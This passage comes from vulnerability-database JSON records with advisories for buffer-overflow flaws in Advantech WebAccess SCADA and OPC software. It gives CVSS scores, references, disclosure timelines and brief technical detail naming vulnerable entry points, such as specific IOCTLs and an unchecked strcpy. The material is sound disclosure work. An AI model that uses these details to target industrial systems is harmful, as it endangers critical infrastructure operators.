Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0238", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2012-0238", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2012-0238", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-53519", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0238", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0238", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-414", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-53519", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2012-0238", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53519" }, { "db": "VULMON", "id": "CVE-2012-0238" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "CNNVD", "id": "CNNVD-201202-414" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in opcImg.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0238" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53519" }, { "db": "VULMON", "id": "CVE-2012-0238" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0238", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.4 }, { "db": "BID", "id": "52051", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201202-414", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0667", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001556", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19D8C7F0-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53519", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2012-0238", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "VULHUB", "id": "VHN-53519" }, { "db": "VULMON", "id": "CVE-2012-0238" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-414" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "id": "VAR-201202-0218", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "VULHUB", "id": "VHN-53519" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0667" } ] }, "last_update_date": "2024-11-23T21:46:31.693000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2012-0667)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10251" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53519" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0238" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0238" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "VULHUB", "id": "VHN-53519" }, { "db": "VULMON", "id": "CVE-2012-0238" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-414" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "VULHUB", "id": "VHN-53519" }, { "db": "VULMON", "id": "CVE-2012-0238" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-414" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0667" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53519" }, { "date": "2012-02-21T00:00:00", "db": "VULMON", "id": "CVE-2012-0238" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-414" }, { "date": "2012-02-21T13:31:57.093000", "db": "NVD", "id": "CVE-2012-0238" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0667" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53519" }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2012-0238" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-414" }, { "date": "2024-11-21T01:34:38.483000", "db": "NVD", "id": "CVE-2012-0238" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-414" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of opcImg.asp Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001556" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-414" } ], "trust": 0.8 } }
var-201602-0471
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7B IOCTL in the BwOpcTool subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy using an Element parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-138", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-138", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7B IOCTL in the BwOpcTool subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy using an Element parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3249", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-138", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ] }, "id": "VAR-201602-0471", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:45:19.059000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-138", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-138", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-138", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll strcpy Heap-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-138" } ], "trust": 0.7 } }
var-201909-0221
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.1 allows a remote, unauthenticated attacker to execute arbitrary code via a crafted IOCTL 70603 RPC message. Advantech WebAccess/SCADA Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer error vulnerability exists in Advantech WebAccess/SCADA version 8.4.1. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201909-0221", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess/scada", "scope": "eq", "trust": 1.4, "vendor": "advantech", "version": "8.4.1" }, { "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "8.4.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.4.1" } ], "sources": [ { "db": "IVD", "id": "6779568d-c80f-445b-ba8e-fa61163d09ad" }, { "db": "CNVD", "id": "CNVD-2019-32466" }, { "db": "JVNDB", "id": "JVNDB-2019-009167" }, { "db": "NVD", "id": "CVE-2019-3975" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess%2Fscada", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009167" } ] }, "cve": "CVE-2019-3975", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3975", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32466", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "6779568d-c80f-445b-ba8e-fa61163d09ad", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155410", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3975", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-3975", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": 